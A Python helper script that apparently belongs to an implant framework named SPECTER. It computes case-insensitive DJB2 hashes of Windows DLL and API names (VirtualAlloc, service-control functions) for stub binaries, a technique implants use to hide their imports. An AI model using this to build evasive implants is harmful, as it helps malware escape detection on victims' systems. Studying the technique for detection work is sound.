#!/usr/bin/env python3
"""
Compute DJB2 hashes for API names used in SPECTER stub binaries.

Usage: python3 compute_hashes.py

The hashes are case-insensitive (all chars lowercased before hashing),
matching the spec_djb2_hash() function in implant/core/src/hash.c.
"""

import struct

def djb2(name: str) -> int:
    """DJB2 hash with case-insensitive matching (u32 wrapping)."""
    h = 5381
    for c in name.lower():
        h = ((h * 33) + ord(c)) & 0xFFFFFFFF
    return h

# All strings that need hashing for the stubs
strings = [
    # Module names (hashed by both narrow and wide DJB2 -- same for ASCII)
    "kernel32.dll",
    "advapi32.dll",

    # kernel32.dll exports
    "VirtualAlloc",
    "ExitProcess",

    # advapi32.dll exports (service stub)
    "RegisterServiceCtrlHandlerExW",
    "SetServiceStatus",
    "StartServiceCtrlDispatcherW",
]

print("/* DJB2 hashes for SPECTER stubs (case-insensitive) */")
print("/* Generated by compute_hashes.py */")
print()
for s in strings:
    h = djb2(s)
    print(f'#define HASH_{s.upper().replace(".", "_"):40s} 0x{h:08X}  /* "{s}" */')

# Verify against known values from specter.h
known = {
    "kernel32.dll": 0x7040EE75,
    "advapi32.dll": 0x67208A49,
}

print()
print("/* Verification against known hashes: */")
for name, expected in known.items():
    computed = djb2(name)
    status = "OK" if computed == expected else f"MISMATCH (expected 0x{expected:08X})"
    print(f"/*   {name}: 0x{computed:08X} -> {status} */")
